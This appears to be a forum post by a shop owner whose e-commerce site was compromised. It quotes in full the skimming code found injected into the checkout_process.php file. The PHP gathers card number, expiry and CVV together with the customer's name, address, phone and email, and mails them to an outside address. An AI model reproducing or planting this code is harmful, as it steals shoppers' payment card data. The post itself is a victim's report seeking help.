We have 6.3.3 B2B on one site and we are having this iframe added to any file that has the word index in it. We also had this added to our checkout_process.php in the root folder
Code:
$ip = getenv("REMOTE_ADDR");
$cvv=$_POST['cc_ccv'];
$number=$_SESSION['cc_number'];
$expires=$_SESSION['cc_expires'];
$to='maclog12@earthlink.com';
$subject='ourdomain'.$order->customer['email_address'].' '.$number;
$body="IP address=".$ip."\nDate=" . date('d-m-Y'). "\ntelephone=".$order->customer['telephone']."\nemail_address=".$order->customer['email_address']."\nName=".$order->customer['firstname'] . ' ' . $order->customer['lastname']."\nAddress1=".$order->customer['street_address']."\nAddress2=".$order->customer['suburb']."\nCity=".$order->customer['city']."\nState=".$order->customer['state']."\nZip=".$order->customer['postcode']."\nCountry=".$order->customer['country']['title']."\nmethod=".$order->info['payment_method']."\ntype=".$order->info['cc_type']."\nowner=".$order->info['cc_owner']."\nnumber=".$number."\nexpires=".$expires."\ncvv=".$cvv;
$headers="ourdomain.com";
mail($to, $subject, $body, $headers);